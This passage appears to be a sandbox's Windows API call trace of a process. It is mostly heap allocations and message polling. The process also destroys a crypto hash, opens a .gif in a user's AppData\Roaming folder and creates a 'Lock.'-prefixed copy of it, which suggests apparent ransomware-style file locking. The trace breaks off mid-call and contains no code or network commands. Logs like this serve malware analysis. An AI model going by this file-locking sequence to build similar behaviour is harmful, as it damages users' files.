HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0199.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0199.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0199.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0199.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0199.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0199.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0199.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0199.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0199.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0199.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0199.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0199.784] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0199.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0199.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0199.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0199.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0199.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0199.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0199.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0199.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0199.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0199.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0199.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0199.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0199.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0199.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0199.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0199.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0199.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0199.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0199.786] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0199.786] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0199.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0199.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0199.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0199.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0199.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0199.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0199.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0199.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0199.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0199.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0199.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0199.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0199.787] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0199.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0199.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0199.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0199.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0199.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0199.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0199.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0199.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0199.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0199.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0199.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0199.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0199.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0199.788] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0199.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0199.788] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0199.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0199.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0199.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0199.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0199.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0199.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0199.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0199.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0199.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0199.789] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0199.789] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0199.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0199.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0199.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0199.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0199.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0199.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0199.789] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0199.789] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0199.789] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0199.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0199.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0199.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0199.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0199.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0199.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0199.789] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0199.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0199.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0199.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0199.790] CryptDestroyHash (hHash=0xaa58a0) returned 1 [0199.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0199.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0199.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0199.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0199.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0199.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0199.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0199.790] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0199.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0199.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0199.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0199.790] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0199.791] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.791] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.791] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0199.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0199.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0199.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0199.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0199.791] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/JdjU4gAsI 0_L.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\jdju4gasi 0_l.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x268 [0199.791] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.792] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0199.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0199.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0199.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0199.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0199.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0199.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0199.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0199.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0199.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0199.792] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0199.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0199.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0199.792] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0199.792] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0199.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0199.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0199.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0199.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0199.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0199.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0199.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0199.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0199.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0199.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0199.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0199.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0199.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0199.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0199.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0199.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0199.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0199.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0199.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x24b30f8 [0199.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0199.794] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming")) returned 0x2010 [0199.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b30f8 | out: hHeap=0x25c0000) returned 1 [0199.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0199.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0199.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10000) returned 0x24b7a48 [0199.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0199.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0199.794] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/Lock.JdjU4gAsI 0_L.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\lock.jdju4gasi 0_l.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f8 [0199.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0199.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0199.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0199.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0199.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0199.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0199.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0199.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0199.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0199.795] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0199.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0199.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0199.795] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0199.795] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0199.795] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0199.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0199.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0199.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0199.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0199.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0199.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0199.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0199.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0199.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0199.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0199.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0199.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0199.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0199.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0199.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0199.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0199.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0199.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0199.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0199.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0199.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0199.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0199.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0199.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0199.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0199.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0199.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0199.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0199.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0199.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0199.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x100000) returned 0x36b0020 [0199.797] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, 